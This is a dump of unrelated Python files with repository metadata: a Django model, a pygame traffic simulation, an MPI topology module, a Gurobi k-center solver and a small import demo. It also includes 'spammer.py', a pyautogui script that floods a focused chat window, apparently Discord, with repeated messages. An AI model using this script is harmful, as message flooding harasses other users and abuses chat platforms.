e5b81ac7187e3d891702be4006393c6f2fc6c15a | 327 | py | Python | apps/experiments/models.py | mikicz/bulk-update-tests | 85bca2ea05513c42d8f12e3439c27853bbed8c44 | [
"MIT"
] | 1 | 2020-02-23T18:16:48.000Z | 2020-02-23T18:16:48.000Z | apps/experiments/models.py | mikicz/bulk-update-tests | 85bca2ea05513c42d8f12e3439c27853bbed8c44 | [
"MIT"
] | null | null | null | apps/experiments/models.py | mikicz/bulk-update-tests | 85bca2ea05513c42d8f12e3439c27853bbed8c44 | [
"MIT"
] | 1 | 2020-01-23T14:21:44.000Z | 2020-01-23T14:21:44.000Z | from django.db import models
class Experiment(models.Model):
INBUILT = 0
PACKAGE = 1
method = models.IntegerField()
field_types = models.CharField(max_length=100)
fields = models.SmallIntegerField()
count = models.IntegerField()
batch_size = models.IntegerField()
time = models.FloatField()
| 21.8 | 50 | 0.700306 | 36 | 327 | 6.277778 | 0.75 | 0.238938 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019157 | 0.201835 | 327 | 14 | 51 | 23.357143 | 0.846743 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5b95944808ec9a85548a9ce892ca8f3e8424bc3 | 751 | py | Python | spammer.py | Potatosil/Pyhton-Discord-Spam-Bot | 7d3f12ae4e9c9933754be484ec2755c22ca079d1 | [
"CC0-1.0"
] | 2 | 2021-11-27T15:54:27.000Z | 2022-01-14T11:21:51.000Z | spammer.py | Potatosil/Python-Discord-Spam-Bot | 7d3f12ae4e9c9933754be484ec2755c22ca079d1 | [
"CC0-1.0"
] | null | null | null | spammer.py | Potatosil/Python-Discord-Spam-Bot | 7d3f12ae4e9c9933754be484ec2755c22ca079d1 | [
"CC0-1.0"
] | null | null | null | import pyautogui, time
from time import sleep
spamnum = int(input(f"Input Number: "))
spamtext = input(f"What is the Message u want to send?: ")
time = 0
while time != 10:
time += 1
sleep(1)
print("spammer waitinig.." + str(time))
def spam (msg, maxMsg):
count = 0
while count != maxMsg:
count += 1
print("sendmessage:" + str(count))
pyautogui.write(msg)
pyautogui.press("enter")
if count == spamnum or count == spamnum*2 or count == spamnum*3 or count == spamnum*4 or count == spamnum*spamnum or count == spamnum*6 or count == spamnum*7 or count == spamnum*8 or count == spamnum*9 or count == spamnum*20:
sleep(5)
spam(spamtext, spamnum)
sleep(2)
pyautogui.write("done")
pyautogui.press("enter")
| 25.033333 | 228 | 0.6498 | 111 | 751 | 4.396396 | 0.432432 | 0.245902 | 0.258197 | 0.086066 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030303 | 0.209055 | 751 | 29 | 229 | 25.896552 | 0.791246 | 0 | 0 | 0.090909 | 0 | 0 | 0.131579 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.136364 | 0.090909 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5bc642c6a81db7a4fc50c2b2445c823d9de303f | 12,795 | py | Python | alterations.py | AlexysAlves/Simulacao_de_trafego | 8193b8a47d284c1b84f2903d286d222f3984bbf1 | [
"MIT"
] | null | null | null | alterations.py | AlexysAlves/Simulacao_de_trafego | 8193b8a47d284c1b84f2903d286d222f3984bbf1 | [
"MIT"
] | null | null | null | alterations.py | AlexysAlves/Simulacao_de_trafego | 8193b8a47d284c1b84f2903d286d222f3984bbf1 | [
"MIT"
] | null | null | null | import random
import time
import threading
import pygame
import sys
# Default values of signal timers
defaultGreen = {0: 10, 1: 10, 2: 10, 3: 10}
defaultRed = 150
defaultYellow = 5
signals = []
noOfSignals = 4
currentGreen = 0 # Indicates which signal is green currently
nextGreen = (currentGreen + 1) % noOfSignals # Indicates which signal will turn green next
currentYellow = 0 # Indicates whether yellow signal is on or off
speeds = {'car': 2.25, 'bus': 1.8, 'truck': 1.8, 'bike': 2.5} # average speeds of vehicles
# Coordinates of vehicles' start
x = {'right': [0, 0, 0], 'down': [755, 727, 697], 'left': [1400, 1400, 1400], 'up': [602, 627, 657]}
y = {'right': [348, 370, 398], 'down': [0, 0, 0], 'left': [498, 466, 436], 'up': [800, 800, 800]}
vehicles = {'right': {0: [], 1: [], 2: [], 'crossed': 0}, 'down': {0: [], 1: [], 2: [], 'crossed': 0},
'left': {0: [], 1: [], 2: [], 'crossed': 0}, 'up': {0: [], 1: [], 2: [], 'crossed': 0}}
vehicleTypes = {0: 'car', 1: 'bus', 2: 'truck', 3: 'bike'}
directionNumbers = {0: 'right', 1: 'down', 2: 'left', 3: 'up'}
# Coordinates of signal image, timer, and vehicle count
signalCoods = [(530, 230), (810, 230), (810, 570), (530, 570)]
signalTimerCoods = [(530, 210), (810, 210), (810, 550), (530, 550)]
# Coordinates of stop lines
stopLines = {'right': 590, 'down': 330, 'left': 800, 'up': 535}
defaultStop = {'right': 580, 'down': 320, 'left': 810, 'up': 545}
# stops = {'right': [580,580,580], 'down': [320,320,320], 'left': [810,810,810], 'up': [545,545,545]}
# Gap between vehicles
stoppingGap = 15 # stopping gap
movingGap = 15 # moving gap
pygame.init()
simulation = pygame.sprite.Group()
class TrafficSignal:
def __init__(self, red, yellow, green):
self.red = red
self.yellow = yellow
self.green = green
self.signalText = ""
class Vehicle(pygame.sprite.Sprite):
def __init__(self, lane, vehicleClass, direction_number, direction):
pygame.sprite.Sprite.__init__(self)
self.lane = lane
self.vehicleClass = vehicleClass
self.speed = speeds[vehicleClass]
self.direction_number = direction_number
self.direction = direction
self.x = x[direction][lane]
self.y = y[direction][lane]
self.crossed = 0
vehicles[direction][lane].append(self)
self.index = len(vehicles[direction][lane]) - 1
path = "images/" + direction + "/" + vehicleClass + ".png"
self.image = pygame.image.load(path)
if (len(vehicles[direction][lane]) > 1 and vehicles[direction][lane][
self.index - 1].crossed == 0): # if more than 1 vehicle in the lane of vehicle before it has crossed stop line
if (direction == 'right'):
self.stop = vehicles[direction][lane][self.index - 1].stop - vehicles[direction][lane][
self.index - 1].image.get_rect().width - stoppingGap # setting stop coordinate as: stop coordinate of next vehicle - width of next vehicle - gap
elif (direction == 'left'):
self.stop = vehicles[direction][lane][self.index - 1].stop + vehicles[direction][lane][
self.index - 1].image.get_rect().width + stoppingGap
elif (direction == 'down'):
self.stop = vehicles[direction][lane][self.index - 1].stop - vehicles[direction][lane][
self.index - 1].image.get_rect().height - stoppingGap
elif (direction == 'up'):
self.stop = vehicles[direction][lane][self.index - 1].stop + vehicles[direction][lane][
self.index - 1].image.get_rect().height + stoppingGap
else:
self.stop = defaultStop[direction]
# Set new starting and stopping coordinate
if (direction == 'right'):
temp = self.image.get_rect().width + stoppingGap
x[direction][lane] -= temp
elif (direction == 'left'):
temp = self.image.get_rect().width + stoppingGap
x[direction][lane] += temp
elif (direction == 'down'):
temp = self.image.get_rect().height + stoppingGap
y[direction][lane] -= temp
elif (direction == 'up'):
temp = self.image.get_rect().height + stoppingGap
y[direction][lane] += temp
simulation.add(self)
def render(self, screen):
screen.blit(self.image, (self.x, self.y))
def move(self):
if (self.direction == 'right'):
if (self.crossed == 0 and self.x + self.image.get_rect().width > stopLines[
self.direction]): # if the image has crossed stop line now
self.crossed = 1
if ((self.x + self.image.get_rect().width <= self.stop or self.crossed == 1 or (
currentGreen == 0 and currentYellow == 0)) and (
self.index == 0 or self.x + self.image.get_rect().width < (
vehicles[self.direction][self.lane][self.index - 1].x - movingGap))):
# (if the image has not reached its stop coordinate or has crossed stop line or has green signal) and (it is either the first vehicle in that lane or it is has enough gap to the next vehicle in that lane)
self.x += self.speed # move the vehicle
elif (self.direction == 'down'):
if (self.crossed == 0 and self.y + self.image.get_rect().height > stopLines[self.direction]):
self.crossed = 1
if ((self.y + self.image.get_rect().height <= self.stop or self.crossed == 1 or (
currentGreen == 1 and currentYellow == 0)) and (
self.index == 0 or self.y + self.image.get_rect().height < (
vehicles[self.direction][self.lane][self.index - 1].y - movingGap))):
self.y += self.speed
elif (self.direction == 'left'):
if (self.crossed == 0 and self.x < stopLines[self.direction]):
self.crossed = 1
if ((self.x >= self.stop or self.crossed == 1 or (currentGreen == 2 and currentYellow == 0)) and (
self.index == 0 or self.x > (
vehicles[self.direction][self.lane][self.index - 1].x + vehicles[self.direction][self.lane][
self.index - 1].image.get_rect().width + movingGap))):
self.x -= self.speed
elif (self.direction == 'up'):
if (self.crossed == 0 and self.y < stopLines[self.direction]):
self.crossed = 1
if ((self.y >= self.stop or self.crossed == 1 or (currentGreen == 3 and currentYellow == 0)) and (
self.index == 0 or self.y > (
vehicles[self.direction][self.lane][self.index - 1].y + vehicles[self.direction][self.lane][
self.index - 1].image.get_rect().height + movingGap))):
self.y -= self.speed
# Initialization of signals with default values
def initialize():
ts1 = TrafficSignal(0, defaultYellow, defaultGreen[0])
signals.append(ts1)
ts2 = TrafficSignal(ts1.red + ts1.yellow + ts1.green, defaultYellow, defaultGreen[1])
signals.append(ts2)
ts3 = TrafficSignal(defaultRed, defaultYellow, defaultGreen[2])
signals.append(ts3)
ts4 = TrafficSignal(defaultRed, defaultYellow, defaultGreen[3])
signals.append(ts4)
repeat()
def repeat():
global currentGreen, currentYellow, nextGreen
while (signals[currentGreen].green > 0): # while the timer of current green signal is not zero
updateValues()
time.sleep(1)
currentYellow = 1 # set yellow signal on
# reset stop coordinates of lanes and vehicles
for i in range(0, 3):
for vehicle in vehicles[directionNumbers[currentGreen]][i]:
vehicle.stop = defaultStop[directionNumbers[currentGreen]]
while (signals[currentGreen].yellow > 0): # while the timer of current yellow signal is not zero
updateValues()
time.sleep(1)
currentYellow = 0 # set yellow signal off
# reset all signal times of current signal to default times
signals[currentGreen].green = defaultGreen[currentGreen]
signals[currentGreen].yellow = defaultYellow
signals[currentGreen].red = defaultRed
currentGreen = nextGreen # set next signal as green signal
nextGreen = (currentGreen + 1) % noOfSignals # set next green signal
signals[nextGreen].red = signals[currentGreen].yellow + signals[
currentGreen].green # set the red time of next to next signal as (yellow time + green time) of next signal
repeat()
# Update values of the signal timers after every second
def updateValues():
for i in range(0, noOfSignals):
if (i == currentGreen):
if (currentYellow == 0):
signals[i].green -= 1
else:
signals[i].yellow -= 1
else:
signals[i].red -= 1
# Generating vehicles in the simulation
def generateVehicles():
daytime = 360
sleeptime = 0
while (True):
lane_number = 2 # original version: random.randint(1,2)
cartype = [60, 70, 80, 100]
dist = [50, 100]
temp1 = random.randint(0, 99)
temp2 = random.randint(0, 99)
direction_number = 0
if (temp1 < cartype[0]):
vehicle_type = 0
elif (temp1 < cartype[1]):
vehicle_type = 1
elif (temp1 < cartype[2]):
vehicle_type = 2
elif (temp1 < cartype[3]):
vehicle_type = 3
if (temp2 < dist[0]):
direction_number = 0
elif (temp2 < dist[1]):
direction_number = 3
if (daytime < 360):
sleeptime = 5
elif (daytime >= 360 and daytime < 480):
sleeptime = 2
elif (daytime >= 480 and daytime < 720):
sleeptime = 3
elif (daytime >= 720 and daytime < 840):
sleeptime = 2
elif (daytime >= 840 and daytime < 1080):
sleeptime = 3
elif (daytime >= 1080 and daytime < 1260):
sleeptime = 1
elif (daytime >= 1260):
sleeptime = 4
Vehicle(lane_number, vehicleTypes[vehicle_type], direction_number, directionNumbers[direction_number])
time.sleep(sleeptime)
daytime += sleeptime
def turnp(probability):
rnumber = random.uniform(0, 1)
if rnumber > probability:
return False
else:
return True
class Main:
thread1 = threading.Thread(name="initialization",target=initialize, args=()) # initialization
thread1.daemon = True
thread1.start()
# Colours
black = (0, 0, 0)
white = (255, 255, 255)
# Screensize
screenWidth = 1400
screenHeight = 800
screenSize = (screenWidth, screenHeight)
# Setting background image i.e. image of intersection
background = pygame.image.load('images/intersection.png')
screen = pygame.display.set_mode(screenSize)
pygame.display.set_caption("SIMULATION")
# Loading signal images and font
redSignal = pygame.image.load('images/signals/red.png')
yellowSignal = pygame.image.load('images/signals/yellow.png')
greenSignal = pygame.image.load('images/signals/green.png')
font = pygame.font.Font(None, 30)
thread2 = threading.Thread(name="generateVehicles",target=generateVehicles, args=()) # Generating vehicles
thread2.daemon = True
thread2.start()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
screen.blit(background,(0,0)) # display background in simulation
for i in range(0,noOfSignals): # display signal and set timer according to current status: green, yello, or red
if(i==currentGreen):
if(currentYellow==1):
signals[i].signalText = signals[i].yellow
screen.blit(yellowSignal, signalCoods[i])
else:
signals[i].signalText = signals[i].green
screen.blit(greenSignal, signalCoods[i])
else:
if(signals[i].red<=10):
signals[i].signalText = signals[i].red
else:
signals[i].signalText = "---"
screen.blit(redSignal, signalCoods[i])
signalTexts = ["","","",""]
# display signal timer
for i in range(0,noOfSignals):
signalTexts[i] = font.render(str(signals[i].signalText), True, white, black)
screen.blit(signalTexts[i],signalTimerCoods[i])
# display the vehicles
for vehicle in simulation:
screen.blit(vehicle.image, [vehicle.x, vehicle.y])
vehicle.move()
pygame.display.update()
Main() | 41.407767 | 220 | 0.590074 | 1,522 | 12,795 | 4.931012 | 0.167543 | 0.023984 | 0.025583 | 0.027981 | 0.300333 | 0.243038 | 0.223584 | 0.192538 | 0.167089 | 0.132445 | 0 | 0.046994 | 0.279875 | 12,795 | 309 | 221 | 41.407767 | 0.767528 | 0.138335 | 0 | 0.195122 | 0 | 0 | 0.031136 | 0.008558 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036585 | false | 0 | 0.020325 | 0 | 0.130081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5bc9bb9de777c853bd717ee97128cd3e2825f2c | 6,327 | py | Python | pylbm/mpi_topology.py | Mopolino8/pylbm | b457ccdf1e7a1009807bd1136a276886f81a9e7d | [
"BSD-3-Clause"
] | 106 | 2016-09-13T07:19:17.000Z | 2022-03-19T13:41:55.000Z | pylbm/mpi_topology.py | Mopolino8/pylbm | b457ccdf1e7a1009807bd1136a276886f81a9e7d | [
"BSD-3-Clause"
] | 53 | 2017-09-18T04:51:19.000Z | 2022-01-19T21:36:23.000Z | pylbm/mpi_topology.py | gouarin/pylbm | fd4419933e05b85be364232fddedfcb4f7275e1f | [
"BSD-3-Clause"
] | 33 | 2016-06-17T13:21:17.000Z | 2021-11-11T16:57:46.000Z | # Authors:
# Loic Gouarin <loic.gouarin@polytechnique.edu>
# Benjamin Graille <benjamin.graille@math.u-psud.fr>
#
# License: BSD 3 clause
"""
Module which implements a Cartesian MPI topology
"""
import numpy as np
import mpi4py.MPI as mpi
from .options import options
class MpiTopology:
"""
Interface construction using a MPI topology.
Parameters
----------
dim : int
number of spatial dimensions (1, 2, or 3)
comm : comm
the default MPI communicator
period : list
boolean list that specifies if a direction is periodic or not.
Its size is dim.
Attributes
----------
dim : int
number of spatial dimensions (1, 2, or 3)
comm : comm
the communicator of the topology
split : tuple
number of processes in each direction
neighbors : list
list of the neighbors where we have to send and to receive messages
sendType : list
list of subarrays that defines the part of data to be send
sendTag : list
list of tags for the send messages
recvType : list
list of subarrays that defines the part of data to update during a receive message
recvTag : list
list of tags for the receive messages
Methods
-------
set_options :
defines command line options.
get_coords :
return the coords of the process in the MPI topology.
set_subarray :
create subarray for the send and receive message
update :
update a numpy array according to the subarrays and the topology.
"""
def __init__(self, dim, period, comm=mpi.COMM_WORLD):
self.dim = dim
self.set_options()
self.comm = comm
# if npx, npy and npz are all set to the default value (1)
# then Compute_dims performs the splitting of the domain
if self.npx == self.npy == self.npz == 1:
size = comm.Get_size()
split = mpi.Compute_dims(size, self.dim)
else:
split = (self.npx, self.npy, self.npz)
self.split = np.asarray(split[:self.dim])
self.cartcomm = comm.Create_cart(self.split, period)
def get_region_indices_(self, n, axis=0):
"""
1D region indices owned by each sub domain.
Parameters
----------
n : int
number of total discrete points for a given axis
axis : int
axis used in the MPI topology
Returns
-------
list
list of regions owned by each processes for a given axis
"""
region_indices = [0]
nproc = self.cartcomm.Get_topo()[0][axis]
for i in range(nproc):
region_indices.append(region_indices[-1] + n//nproc + ((n % nproc) > i))
return region_indices
def get_region_indices(self, nx, ny=None, nz=None):
"""
Region indices owned by each sub domain.
Parameters
----------
nx : int
number of total discrete points in x direction
ny : int
number of total discrete points in y direction
default is None
nz : int
number of total discrete points in z direction
default is None
Returns
-------
list
list of regions owned by each processes
"""
region_indices = [self.get_region_indices_(nx, 0)]
if ny is not None:
region_indices.append(self.get_region_indices_(ny, 1))
if nz is not None:
region_indices.append(self.get_region_indices_(nz, 2))
return region_indices
def get_coords(self):
"""
return the coords of the process in the MPI topology
as a numpy array.
"""
rank = self.cartcomm.Get_rank()
return np.asarray(self.cartcomm.Get_coords(rank))
def get_region(self, nx, ny=None, nz=None):
"""
Region indices owned by the sub domain.
Parameters
----------
nx : int
number of total discrete points in x direction
ny : int
number of total discrete points in y direction
default is None
nz : int
number of total discrete points in z direction
default is None
Returns
-------
list
region owned by the process
"""
region_indices = self.get_region_indices(nx, ny, nz)
coords = self.get_coords()
region = []
for i in range(coords.size):
region.append([region_indices[i][coords[i]],
region_indices[i][coords[i] + 1]
])
return region
def set_options(self):
"""
defines command line options.
"""
self.npx = int(options().npx)
self.npy = int(options().npy)
self.npz = int(options().npz)
def get_directions(dim):
"""
Return an array with all the directions around.
Parameters
----------
dim : int
number of spatial dimensions (1, 2, or 3)
Returns
-------
ndarray
all the possible directions with a stencil of 1
Examples
--------
>>> get_directions(1)
array([[-1],
[ 0],
[ 1]])
>>> get_directions(2)
array([[-1, -1],
[-1, 0],
[-1, 1],
[ 0, -1],
[ 0, 0],
[ 0, 1],
[ 1, -1],
[ 1, 0],
[ 1, 1]], dtype=int32)
"""
common_direction = np.array([-1, 0, 1])
if dim == 1:
directions = common_direction[:, np.newaxis]
elif dim == 2:
common_direction = common_direction[np.newaxis, :]
directions = np.empty((9, 2), dtype=np.int32)
directions[:, 0] = np.repeat(common_direction, 3, axis=1).flatten()
directions[:, 1] = np.repeat(common_direction, 3, axis=0).flatten()
elif dim == 3:
common_direction = common_direction[np.newaxis, :]
directions = np.empty((27, 3), dtype=np.int32)
directions[:, 0] = np.repeat(common_direction, 9, axis=1).flatten()
directions[:, 1] = np.repeat(np.repeat(common_direction, 3, axis=0), 3).flatten()
directions[:, 2] = np.repeat(common_direction, 9, axis=0).flatten()
return directions
| 26.472803 | 89 | 0.5633 | 793 | 6,327 | 4.417402 | 0.211854 | 0.074222 | 0.031402 | 0.031973 | 0.475592 | 0.439052 | 0.39509 | 0.343134 | 0.329717 | 0.2495 | 0 | 0.018792 | 0.335546 | 6,327 | 238 | 90 | 26.584034 | 0.814462 | 0.460408 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116667 | false | 0 | 0.05 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5bd1c8d864738a7eee90d8736eddcad096e5f3d | 10,060 | py | Python | exact.py | jesgadiaz/ckc | 717e7289fff530ea5be4d6db94dc2936e355ed8c | [
"Apache-2.0"
] | 1 | 2020-02-20T10:01:03.000Z | 2020-02-20T10:01:03.000Z | exact.py | jesgadiaz/ckc | 717e7289fff530ea5be4d6db94dc2936e355ed8c | [
"Apache-2.0"
] | null | null | null | exact.py | jesgadiaz/ckc | 717e7289fff530ea5be4d6db94dc2936e355ed8c | [
"Apache-2.0"
] | 1 | 2019-12-05T05:30:50.000Z | 2019-12-05T05:30:50.000Z | from gurobipy import *
import math
import numpy as np
import heapq
def heap_sort(items):
heapq.heapify(items)
items[:] = [heapq.heappop(items) for i in range(len(items))]
return items
def createGraph(input_file, instance_format):
global n, m , k, matrix, ordered_sizes
if instance_format == 'orlib':
f = open(input_file, "r")
matrix = []
for i in range(0,n):
list = []
for j in range(0,n):
list.append(float("inf"))
matrix.append(list)
m = sum(1 for line in open(input_file))
#with open(input_file, "r") as f:
for i in range(0, m):
string = f.readline()
string = string.split()
if string is not "EOF":
v1 = int(string[0]) - 1
v2 = int(string[1]) - 1
weight = int(string[2])
matrix[v1][v2] = weight
matrix[v2][v1] = weight
f.close()
for i in range(0, n):
matrix[i][i] = 0
for i in range(0, n):
#print(i)
for j in range(0, n):
for l in range(0, n):
if matrix[i][j] == float("inf") or matrix[i][l] == float("inf"):
cost = float("inf")
else:
cost = matrix[i][j] + matrix[i][l]
if cost < matrix[j][l]:
matrix[j][l] = cost
ordered_sizes = []
for i in range(0, n):
for j in range(i, n):
ordered_sizes.append(matrix[i][j])
ordered_sizes = heap_sort(ordered_sizes)
elif instance_format == 'tsplib':
f = open(input_file, "r")
m = n
matrix = []
for i in range(0,n):
list = []
for j in range(0,n):
list.append(float("inf"))
matrix.append(list)
positions = []
for i in range(0, m):
string = f.readline()
string = string.split()
temp_position = []
temp_position.append(int(string[0])-1)
temp_position.append(float(string[1]))
temp_position.append(float(string[2]))
positions.append(temp_position)
for i in range(0, n):
for j in range(0, n):
dist_temp = math.sqrt(((positions[i][1] - positions[j][1]) * (positions[i][1] - positions[j][1])) + ((positions[i][2] - positions[j][2]) * (positions[i][2] - positions[j][2])))
matrix[i][j] = dist_temp
matrix[j][i] = dist_temp
f.close()
for i in range(0, n):
matrix[i][i] = 0
ordered_sizes = []
for i in range(0, n):
for j in range(i, n):
ordered_sizes.append(matrix[i][j])
ordered_sizes = heap_sort(ordered_sizes)
def run(r):
global total_runtime, k, runtime, num_centers, m, cap, input_file
prunedMatrix = []
for i in range(0,n):
list = []
for j in range(0,n):
list.append(float(0))
prunedMatrix.append(list)
for i in range(0,n):
for j in range(0,n):
if matrix[i][j] <= r:
prunedMatrix[i][j] = 1
try:
global m, num_centers, runtime, cap
m = Model("mip1")
#******************************************************************************************************
m.setParam("MIPGap", 0.0);
#******************************************************************************************************
y = []
for i in range(n):
y.append(0)
for i in range(n):
y[i] = m.addVar(vtype=GRB.BINARY, name="y%s" % str(i+1))
m.setObjective(sum(y), GRB.MINIMIZE)
temp_list = np.array(prunedMatrix).T.tolist()
for i in range(n):
m.addConstr(sum(np.multiply(temp_list[i], y).tolist()) >= 1)
x = []
for i in range(n):
temp = []
for j in range(n):
temp.append(0)
x.append(temp)
for i in range(n):
for j in range(n):
x[i][j] = m.addVar(vtype=GRB.BINARY, name="x%s%s" % (str(i+1), str(j+1)))
temp_list_2 = np.array(x).T.tolist()
for i in range(n):
m.addConstr(sum(temp_list_2[i]) * y[i] <= L)
for i in range(n):
for j in range(n):
#m.addConstr(x[i][j] <= y[j] * prunedMatrix[i][j])
#******************************************************************************************************
m.addConstr(x[i][j] <= y[j] * prunedMatrix[i][j] * (1-y[i]))
#******************************************************************************************************
for i in range(n):
#m.addConstr(sum(x[i]) == 1)
#******************************************************************************************************
m.addConstr(sum(x[i]) == 1 * (1-y[i]))
#******************************************************************************************************
m.optimize()
runtime = m.Runtime
print("The run time is %f" % runtime)
print("Obj:", m.objVal)
#******************************************************************************************************
dom_set_size = 0
solution = []
assignment = []
center = 0
vertex_j = 1
vertex_i = 1
for v in m.getVars():
varName = v.varName
if varName[0] == 'y':
if v.x == 1.0:
dom_set_size = dom_set_size + 1
solution.append(varName[1:])
else:
if vertex_j <= n:
if v.x == 1.0:
assignment.append([vertex_i, vertex_j])
else:
vertex_i = vertex_i + 1
vertex_j = 1
vertex_j = vertex_j + 1
print("Cap. dom. set cardinality: " + str(dom_set_size))
solution = [int(i) for i in solution]
#print("solution: " + str(solution))
#print("assignment: " + str(assignment))
print('{"instance": "%s",' % input_file)
print('"centers": [')
counter = 0
for center in solution:
counter = counter + 1
nodes = []
for node in assignment:
if node[1] == center:
nodes.append(node[0])
if counter == len(solution):
print('{ "center": ' + str(center) + ', "nodes": ' + str(nodes) + '}')
else:
print('{ "center": ' + str(center) + ', "nodes": ' + str(nodes) + '},')
print(']}')
#print('%s %g' % (v.varName, v.x))
#******************************************************************************************************
# {"instance": "/home/ckc/Escritorio/pr124.tsp",
# "outliers": [83,40,115,114],
# "centers": [ { "center": 59, "nodes": [28,32,33,34,35,54,57,58,59,60,61,64,65]},
# { "center": 102, "nodes": [101,102,103,104,105,106,107,108,109,110,111,112,113]},
# { "center": 8, "nodes": [8,9,10,11,12,13,14,15,16,46,47,48,49]},
# { "center": 79, "nodes": [77,78,79,91,92,93,94,95,96,97,98,99,123]},
# { "center": 6, "nodes": [0,1,2,3,4,5,6,7,26,27,29,30,31]},
# { "center": 36, "nodes": [19,20,21,22,23,24,25,36,37,38,39,55,56]},
# { "center": 16, "nodes": [17,18,40,41,42,43,44,45,50,51,52,53]},
# { "center": 96, "nodes": [72,73,74,75,76,80,116,117,118,119,120,121,122]},
# { "center": 89, "nodes": [84,85,86,87,88,89,90,100]},
# { "center": 64, "nodes": [62,63,66,67,68,69,70,71,81,82,83,114,115]}
# ]}
num_centers = dom_set_size
# num_centers = m.objVal
except GurobiError:
print("Error reported")
def binarySearch():
global total_runtime, k, runtime, num_centers, input_file
total_runtime = 0
not_done = True
upper = len(ordered_sizes) - 1
lower = 0
best_solution_size = float("inf")
while not_done:
#mid = math.ceil(lower + ((upper - lower)/2))
mid = math.ceil((upper + lower) /2)
mid_value = ordered_sizes[int(mid)]
if mid == upper:
not_done = False
run(mid_value)
total_runtime = total_runtime + runtime
else:
run(mid_value)
total_runtime = total_runtime + runtime
if num_centers <= k:
upper = mid
print("UPPER = MID")
if mid_value <= best_solution_size:
best_solution_size = mid_value
else:
lower = mid
print("LOWER = MID")
print("best solution size: " + str(best_solution_size))
print("total runtime: " + str(total_runtime))
if __name__ == "__main__":
global total_runtime, k, runtime, num_centers, L, n
if len(sys.argv) != 6:
print ("Wrong number of arguments")
print ("exact input_file_path n k L instance_format")
sys.exit()
input_file = sys.argv[1]
n = int(sys.argv[2])
k = int(sys.argv[3])
L = int(sys.argv[4])
instance_format = sys.argv[5]
createGraph(input_file, instance_format)
binarySearch()
| 37.677903 | 193 | 0.41004 | 1,152 | 10,060 | 3.488715 | 0.235243 | 0.057477 | 0.032844 | 0.057477 | 0.36427 | 0.329933 | 0.276437 | 0.233143 | 0.185369 | 0.185369 | 0 | 0.061296 | 0.375646 | 10,060 | 266 | 194 | 37.819549 | 0.57857 | 0.199006 | 0 | 0.348259 | 0 | 0 | 0.042515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019901 | false | 0 | 0.019901 | 0 | 0.044776 | 0.074627 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5bd703be1b27cb762cec30b232a4d069f3d4c16 | 204 | py | Python | PySrc/4day/Mod00.py | Timmy-Oh/Adorable-Lab | c21454d011e6888fd28c41d1624721ea1826be40 | [
"Apache-2.0"
] | null | null | null | PySrc/4day/Mod00.py | Timmy-Oh/Adorable-Lab | c21454d011e6888fd28c41d1624721ea1826be40 | [
"Apache-2.0"
] | null | null | null | PySrc/4day/Mod00.py | Timmy-Oh/Adorable-Lab | c21454d011e6888fd28c41d1624721ea1826be40 | [
"Apache-2.0"
] | null | null | null | # Mod00.py
print('name: {}'.format(__name__))
import Calc00
import Calc00 as c
from Calc00 import *
x= 20; y= 10;
Calc00.Sum(x, y)
c.Sub(x,y)
Mul(x,y)
import sys
for path in sys.path:
print(path)
| 12 | 34 | 0.661765 | 39 | 204 | 3.358974 | 0.538462 | 0.045802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083832 | 0.181373 | 204 | 16 | 35 | 12.75 | 0.700599 | 0.039216 | 0 | 0 | 0 | 0 | 0.041237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e5bd9846792ca0380e9358b95728eb11553310f8 | 1,887 | py | Python | bot.py | liamkirsh/FBChatBot | 59eafee2c78f2d6a93c38a74fecf1a4d311a00e9 | [
"MIT"
] | 3 | 2017-07-23T20:10:19.000Z | 2020-09-23T21:21:47.000Z | bot.py | liamkirsh/FBChatBot | 59eafee2c78f2d6a93c38a74fecf1a4d311a00e9 | [
"MIT"
